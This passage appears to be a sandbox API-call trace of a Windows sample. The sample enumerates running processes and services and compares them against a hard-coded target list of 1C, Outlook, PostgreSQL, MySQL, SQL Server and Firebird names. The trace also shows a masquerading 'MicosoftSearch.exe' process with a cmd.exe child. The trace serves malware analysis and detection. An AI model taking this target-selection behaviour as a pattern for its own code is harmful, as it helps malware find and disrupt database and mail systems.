lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0241.059] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0241.059] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0241.059] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0241.059] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0241.059] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.060] lstrlenW (lpString="services.exe") returned 12 [0241.060] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0241.060] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0241.060] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.060] lstrlenW (lpString="lsass.exe") returned 9 [0241.060] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0241.060] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0241.060] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0241.060] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0241.060] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0241.060] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0241.060] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0241.060] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0241.061] lstrlenW (lpString="lsm.exe") returned 7 [0241.061] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0241.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0241.061] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0241.061] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0241.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0241.061] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0241.061] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0241.061] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.061] lstrlenW (lpString="svchost.exe") returned 11 [0241.061] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.061] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.061] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.062] lstrlenW (lpString="svchost.exe") returned 11 [0241.062] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.062] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.062] lstrlenW (lpString="svchost.exe") returned 11 [0241.062] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.062] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0241.063] lstrlenW (lpString="LogonUI.exe") returned 11 [0241.063] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0241.063] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0241.063] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0241.063] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0241.063] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0241.063] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0241.063] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0241.063] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.063] lstrlenW (lpString="svchost.exe") returned 11 [0241.063] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.063] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.063] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.064] lstrlenW (lpString="svchost.exe") returned 11 [0241.064] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.064] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.064] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.064] lstrlenW (lpString="audiodg.exe") returned 11 [0241.064] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0241.064] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0241.064] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0241.064] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0241.064] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0241.064] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0241.064] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0241.064] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.064] lstrlenW (lpString="svchost.exe") returned 11 [0241.064] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0241.065] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0241.065] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.065] lstrlenW (lpString="svchost.exe") returned 11 [0241.065] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0241.065] lstrlenW (lpString="userinit.exe") returned 12 [0241.065] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.065] lstrlenW (lpString="dwm.exe") returned 7 [0241.066] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.066] lstrlenW (lpString="explorer.exe") returned 12 [0241.066] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.066] lstrlenW (lpString="spoolsv.exe") returned 11 [0241.066] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.066] lstrlenW (lpString="taskhost.exe") returned 12 [0241.066] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.067] lstrlenW (lpString="svchost.exe") returned 11 [0241.067] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0241.067] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0241.067] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0241.067] lstrlenW (lpString="reader_sl.exe") returned 13 [0241.067] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0241.067] lstrlenW (lpString="cmd.exe") returned 7 [0241.067] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0241.068] lstrlenW (lpString="conhost.exe") returned 11 [0241.068] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0241.068] CloseHandle (hObject=0x120) returned 1 [0241.068] Sleep (dwMilliseconds=0x1f4) [0241.814] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47d59e8 [0242.018] EnumServicesStatusExW (in: hSCManager=0x47d59e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0242.019] GetLastError () returned 0xea [0242.019] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xacc) returned 0x4819790 [0242.019] EnumServicesStatusExW (in: hSCManager=0x47d59e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4819790, cbBufSize=0xacc, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4819790, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0242.019] CloseServiceHandle (hSCObject=0x47d59e8) returned 1 [0242.019] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0242.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0242.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0242.020] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0242.020] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0242.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0242.020] lstrlenW (lpString="AudioSrv") returned 8 [0242.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0242.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0242.020] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0242.020] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0242.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0242.020] lstrlenW (lpString="BFE") returned 3 [0242.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0242.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0242.022] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0242.022] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0242.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0242.022] lstrlenW (lpString="CscService") returned 10 [0242.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0242.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0242.022] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0242.022] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0242.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0242.022] lstrlenW (lpString="DcomLaunch") returned 10 [0242.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0242.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0242.022] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0242.022] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0242.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0242.022] lstrlenW (lpString="Dhcp") returned 4 [0242.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0242.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0242.022] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0242.022] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0242.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0242.022] lstrlenW (lpString="Dnscache") returned 8 [0242.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0242.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0242.022] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0242.023] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0242.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0242.023] lstrlenW (lpString="eventlog") returned 8 [0242.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0242.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0242.023] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0242.023] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0242.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0242.023] lstrlenW (lpString="EventSystem") returned 11 [0242.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0242.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0242.023] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0242.023] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0242.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0242.023] lstrlenW (lpString="gpsvc") returned 5 [0242.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0242.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0242.023] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0242.023] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0242.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0242.023] lstrlenW (lpString="LanmanWorkstation") returned 17 [0242.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0242.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0242.023] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0242.023] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0242.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0242.023] lstrlenW (lpString="lmhosts") returned 7 [0242.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0242.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0242.024] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0242.024] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0242.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0242.024] lstrlenW (lpString="MMCSS") returned 5 [0242.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0242.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0242.024] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0242.024] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0242.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0242.024] lstrlenW (lpString="MpsSvc") returned 6 [0242.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0242.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0242.024] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0242.024] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0242.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0242.024] lstrlenW (lpString="nsi") returned 3 [0242.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0242.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0242.024] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0242.024] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0242.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0242.024] lstrlenW (lpString="PlugPlay") returned 8 [0242.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0242.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0242.024] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0242.024] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0242.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0242.024] lstrlenW (lpString="Power") returned 5 [0242.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0242.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0242.025] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0242.025] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0242.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0242.025] lstrlenW (lpString="ProfSvc") returned 7 [0242.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0242.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0242.025] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0242.025] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0242.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0242.025] lstrlenW (lpString="RpcEptMapper") returned 12 [0242.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0242.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0242.025] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0242.025] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0242.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0242.025] lstrlenW (lpString="RpcSs") returned 5 [0242.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0242.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0242.025] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0242.025] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0242.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0242.025] lstrlenW (lpString="SamSs") returned 5 [0242.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0242.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0242.025] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0242.025] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0242.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0242.025] lstrlenW (lpString="Schedule") returned 8 [0242.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0242.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0242.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0242.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0242.026] lstrcmpiW (lpString1="sqlserveradhelper", 